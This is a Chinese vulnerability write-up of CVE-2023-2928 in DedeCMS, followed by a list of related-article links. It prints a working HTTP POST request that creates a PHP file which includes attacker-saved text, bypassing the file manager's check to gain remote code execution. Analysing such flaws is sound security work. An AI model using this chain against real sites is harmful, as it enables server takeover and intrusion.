CVE-2023-2928 DedeCMS 文件包含漏洞getshell 漏洞分析

DedeCMS(也称为织梦CMS)是一款基于PHP+MySQL的开源内容管理系统。

在 DedeCMS 5.7.106 及之前的版本中发现一个漏洞。它已被宣布为关键。受此漏洞影响的是未知功能的文件uploads/dede/article_allowurl_edit.php。对参数 allurls 的操作会导致代码注入。攻击可以远程发起。该漏洞已向公众披露并可能被使用。此漏洞的关联标识符为 VDB-230083。

漏洞复现

访问article_allowurl_edit.php页面 保存超链接

访问file_manage_control.php 利用文件包含构造1.php

POST /dede/file_manage_control.php HTTP/1.1

fmdo=edit&backurl=&token=&activepath=&filename=1.php&str=<?php Include_once("./data/admin/allowurl.txt"); ?>&B1=++%E4%BF%9D+%E5%AD%98++

访问1.php

漏洞分析

article_allowurl_edit.php

可以将用户输入的字符保存到/admin/allowurl.txt ,因为有stripslashes函数的过滤xss无效

file_manage_control.php

这里就不分析后端了 我们之前看这个页面的功能

file_manage_control.php 页面为用户提供了网站文件管理的功能,

尝试在php中或txt中添加php执行代码结果被检测了

这样的话一般的利用方式就不行了,好在cms没用禁用掉文件包含的逻辑,我们可以利用/admin/allowurl.txt 这个文件,实现文件包含任意代码执行。

创建文件1.php

其内容为<?php Include_once("./data/admin/allowurl.txt"); ?>

之后访问1.php 即可执行我们想要的代码

相关推荐
智想天开4 小时前
8.集成模板引擎
php
安全方案6 小时前
精心整理-2024最新网络安全-信息安全全套资料(学习路线、教程笔记、工具软件、面试文档).zip
笔记·学习·web安全
神经毒素7 小时前
WEB安全--文件上传漏洞--一句话木马的工作方式
网络·安全·web安全·文件上传漏洞
swift开发pk OC开发7 小时前
如何轻松查看安卓手机内存,让手机更流畅
websocket·网络协议·tcp/ip·http·网络安全·https·udp
杭州默安科技8 小时前
大模型AI Agent的工作原理与安全挑战
人工智能·安全
swift开发pk OC开发9 小时前
flutter框架中文文档,android智能手机编程答案
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Json201131510 小时前
Swoole 的 Hyperf 框架和 Go 的 Gin 框架高并发原理以及技术实现对比分析
网络·php·gin·swoole
Python大数据分析@11 小时前
python 常用的6个爬虫第三方库
爬虫·python·php
我是唐青枫11 小时前
php8属性注解使用教程
php
go_to_hacker11 小时前
AI进行全自动渗透
网络·web安全·网络安全·渗透测试·代码审计